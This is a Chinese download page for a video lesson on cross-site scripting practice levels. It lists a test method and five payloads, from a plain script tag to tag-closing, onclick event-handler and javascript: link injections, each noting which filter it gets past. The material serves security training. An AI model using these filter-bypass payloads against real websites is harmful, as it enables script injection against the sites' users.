您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第十六课:xss实战练习一
实战渗透测试第十六课:xss实战练习一
软件大小:34.6 MB
更新时间:2016-11-04 02:19
授权方式:共享版
人气访问:225次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第十六课:xss实战练习一介绍

讲师:上善若水

动画名称:第十六课   xss练习(1)


测试环境:Windows7 系统


1.首先寻找输入点

2.查出输出点

3.测试特殊符号  <> "" ''

4.构造


第一关:<script>alert(1)</script>  没有做任何的过滤


在value值中,无论是何任的语句只要被单引号或双引号包起来的都会被当作字符串原样的输出出来


第二关:"><script>alert(1)</script><"      没有做任何过滤,可以闭合标签


第三关:' onclick='alert(1)     过滤了<> 双引号  没有过滤单引号  利用事件


第四关:" onclick="alert(1)     思路同上,只不过把单引号改为双引号


第五关:"><a href=javascript:alert(1)>xss,</a><"     没有对任何的特殊字符过滤,但对script,onclick等关键进行了下划线转义,而没有对javascript这个关键字做过滤

实战渗透测试第十六课:xss实战练习一下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号